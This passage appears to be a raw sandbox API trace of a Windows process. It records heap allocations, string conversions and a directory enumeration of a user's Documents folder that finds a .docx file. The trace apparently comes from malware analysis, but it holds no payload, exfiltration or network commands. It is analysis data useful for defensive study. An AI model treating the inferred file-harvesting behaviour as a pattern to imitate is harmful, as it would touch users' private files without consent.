HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0215.004] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a77c38, cbMultiByte=26, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 26 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x34) returned 0x2a5e700 [0215.004] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a77c38, cbMultiByte=26, lpWideCharStr=0x2a5e700, cchWideChar=26 | out: lpWideCharStr="C:\\Users\\FD1HVy\\Documents") returned 26 [0215.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0215.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fae0 | out: hHeap=0x2af0000) returned 1 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0215.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0215.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0215.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0215.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0215.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0215.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0215.006] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0215.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0215.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0215.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0215.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0215.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0215.006] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0215.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0215.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0215.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0215.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0215.006] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0215.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0215.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0215.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0215.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0215.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0215.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0215.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0215.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0215.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0215.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0215.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0215.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0215.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0215.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0215.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0215.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0215.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17) returned 0x29f7180 [0215.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x29f7180, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0215.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0215.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0215.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0215.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x59) returned 0x2a74b88 [0215.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab260 [0215.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0215.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2a71cf8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0215.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0215.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0215.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0215.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74b88 | out: hHeap=0x2af0000) returned 1 [0215.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0215.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0215.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0215.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0215.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0215.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0215.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0215.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0215.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0215.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0215.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0215.009] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0215.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0215.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0215.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0215.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0215.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0215.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0215.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0215.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0215.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0215.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0215.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0215.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0215.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0215.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0215.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0215.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0215.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0215.010] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0215.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0215.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0215.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0215.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0215.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0215.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0215.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0215.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0215.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0215.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0215.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0215.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0215.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0215.010] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3a011695, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3a011695, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0x9e1bf8 [0215.010] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3a011695, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3a011695, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0215.010] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd02cd50, ftCreationTime.dwHighDateTime=0x1d596a9, ftLastAccessTime.dwLowDateTime=0x979171f0, ftLastAccessTime.dwHighDateTime=0x1d58707, ftLastWriteTime.dwLowDateTime=0x979171f0, ftLastWriteTime.dwHighDateTime=0x1d58707, nFileSizeHigh=0x0, nFileSizeLow=0x11490, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="23iZdkXXLok6512uz.docx", cAlternateFileName="23IZDK~1.DOC")) returned 1 [0215.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70a0 [0215.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2e) returned 0x2aa64c0 [0215.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0215.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0215.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0215.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0215.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0215.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0215.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0215.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.011] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0215.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0215.011] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0215.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0215.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0215.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0215.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0215.011] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0215.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0215.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0215.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6338 [0215.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0215.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa64c0 | out: hHeap=0x2af0000) returned 1 [0215.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0215.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0215.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.012] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0215.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0215.012] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0215.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0215.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0215.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0215.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0215.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0215.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0215.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0215.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0215.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0215.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0215.013] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0215.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0215.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0215.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0215.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0215.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0215.013] 